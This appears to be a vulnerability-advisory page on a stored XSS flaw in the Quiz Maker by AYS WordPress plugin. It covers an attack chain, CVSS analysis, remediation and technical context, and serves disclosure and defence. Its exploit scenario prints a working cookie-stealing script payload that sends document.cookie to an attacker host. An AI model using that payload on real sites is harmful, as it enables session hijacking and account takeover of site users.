Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata – not a confirmed exploit chain
-
ReconAttacker identifies unpatched Quiz Maker plugin
-
DeliveryCrafts malicious JavaScript payload in 'rate_reason' field
-
ExploitSubmits form with XSS payload
-
InstallPlugin stores unsanitized payload in database
-
C2Victim user accesses quiz results page
-
ExecuteStored script executes in victim's browser context
-
ImpactAttacker exfiltrates session cookies or performs admin actions
Vulnerability Assessment
| Weakness |
CWE
OWASP Top 10:2025
A05:2025 - Injection
ASVS 5.0
V1 - Encoding and Sanitization Output encoding, context-aware escaping
MITRE ATT&CK
2 techniques across 2 tactics: Initial Access, Execution The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up. |
| Exploitation Conditions | The vulnerability requires that the 'rate_reason' parameter is exposed and functional in the quiz submission interface - specifically, a public-facing form that accepts user ratings or reviews without authentication. Unauthenticated exploitation is confirmed by CVSS vector PR:N. However, the attacker cannot control exactly which users will be affected (passive victims) - impact depends on site administrators or other visitors viewing the quiz results or rating display page after injection. The vulnerability does NOT require any special plugin configuration or non-default settings - the 'rate_reason' parameter processing is part of the standard plugin functionality. Sites with quiz submission disabled or with access restrictions limiting who can submit quiz responses will reduce exposure, but the core vulnerability exists in all enabled installations of vulnerable versions. The scope change (S:C) in the CVSS vector indicates the vulnerability can affect other users or components beyond the direct scope of the quiz plugin itself. |
| Impact | CVSS score of 5.8 (Medium) with network vector (AV:N), low complexity (AC:L), no privilege requirement (PR:N), and no user interaction (UI:N) indicates a readily exploitable flaw. However, the scope is marked as Changed (S:C) with only Low confidentiality impact (C:L) and no integrity or availability impact, which appears inconsistent with typical Stored XSS severity - stored XSS normally permits account takeover, session hijacking, or page defacement (higher integrity/confidentiality impact). The CVSS vector's UI:N designation is concerning: Stored XSS technically requires a victim to view the injected page, which is a form of user interaction, though not active participation. The absence of KEV confirmation, active exploitation signals, or public POC at time of analysis suggests this is a discovered vulnerability published through coordinated disclosure (Wordfence source) rather than actively exploited in the wild. Risk is elevated for WordPress sites running vulnerable versions with public-facing quiz functionality, but the Medium CVSS rating and lack of active exploitation indicators suggest this is not an emergency-priority patch for most organizations. Organizations with user-generated content features should prioritize updating. |
| Exploit ScenarioDerived | An attacker identifies a WordPress site running Quiz Maker by AYS version 6.7.1.29 or earlier with an exposed quiz submission form. The attacker submits a quiz response containing malicious JavaScript in the 'rate_reason' field, such as <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>. The payload is stored in the plugin's database without sanitization. When site administrators or other users view the quiz results or rating summary page, the stored JavaScript executes in their browser context, sending their session cookies to the attacker's server. The attacker can then use stolen session cookies to impersonate users or administrators, depending on which accounts viewed the injected page. |
Get an e-mail when this CVE is exploited, patched or re-scored. Free account.
Alert meAnalysisAIv1 – May 02, 2026
Stored Cross-Site Scripting (XSS) in Quiz Maker by AYS WordPress plugin versions up to 6.7.1.29 allows unauthenticated attackers to inject arbitrary JavaScript through the 'rate_reason' parameter due to insufficient input sanitization and output escaping. Injected scripts execute in the browsers of all users who view affected pages, enabling credential theft, malware distribution, or defacement without requiring authentication or user interaction.
RemediationAI
Update Quiz Maker by AYS to version 6.7.1.30 or later, which patches the vulnerability by implementing proper input sanitization using WordPress sanitization functions and output escaping via wp_kses_post() or context-appropriate escaping. The patched version is confirmed in the WordPress plugin repository changeset referenced (https://plugins.trac.wordpress.org/changeset/3513370/quiz-maker). WordPress administrators should navigate to Plugins > Installed Plugins, locate 'Quiz Maker by AYS', and click 'Update Now' to apply the patch immediately. If immediate patching is not possible, disable the quiz functionality or restrict access to the quiz plugin via .htaccess, WordPress user role restrictions, or plugin disablement until the patch can be applied. Be aware that disabling the plugin will render quiz features unavailable to end users and should be treated as a temporary measure only. Review any stored quiz submissions or ratings created before patching for evidence of XSS payload injection.
Affected VersionsENISA
Affected Packages
Source: OSV (Open Source Vulnerabilities)
Affects your stack
Affects 1 package in euvd
Checking this CVE against your own stacks and servers is part of the Basic plan and up.
Technical ContextAI · show details
Quiz Maker by AYS is a WordPress plugin (CPE: cpe:2.3:a:ays-pro:quiz_maker_by_ays) that provides quiz functionality to WordPress sites. The vulnerability exists in the handling of the 'rate_reason' parameter, which accepts user-supplied input that is stored in the database without proper sanitization and later rendered in page output without adequate HTML entity encoding or context-aware escaping. This is a classic Stored XSS vulnerability (CWE-79) where attacker-controlled data persists in the application database and is reflected to other users, making it more severe than Reflected XSS. The plugin fails to apply WordPress security functions such as sanitize_text_field() during input processing and wp_kses_post() or esc_html() during output rendering.
Know when Quiz Maker By Ays gets its next vulnerability
- Watch products and get an email when something new is published
- Check this CVE against your own stack and servers
- Exploit and PoC references, threat intelligence from 22 sources
No credit card · 7-day full trial
Severity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
DescriptionCVE.org
The Quiz Maker by AYS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rate_reason' parameter in all versions up to, and including, 6.7.1.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Threat Intelligence Overview
How this decision was reached
The engine reads each signal below and applies a fixed list of rules from top to bottom. The first rule that matches sets the recommended action – like a statement, every line is shown.
What every action level means
SSVC AssessmentENISA
Priority Score
Attack Technique
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
EUVD-2026-26786
NVD
CVE.org
EPSS
Vulnrichment
VulDB
GitHub PoC
Exploit-DB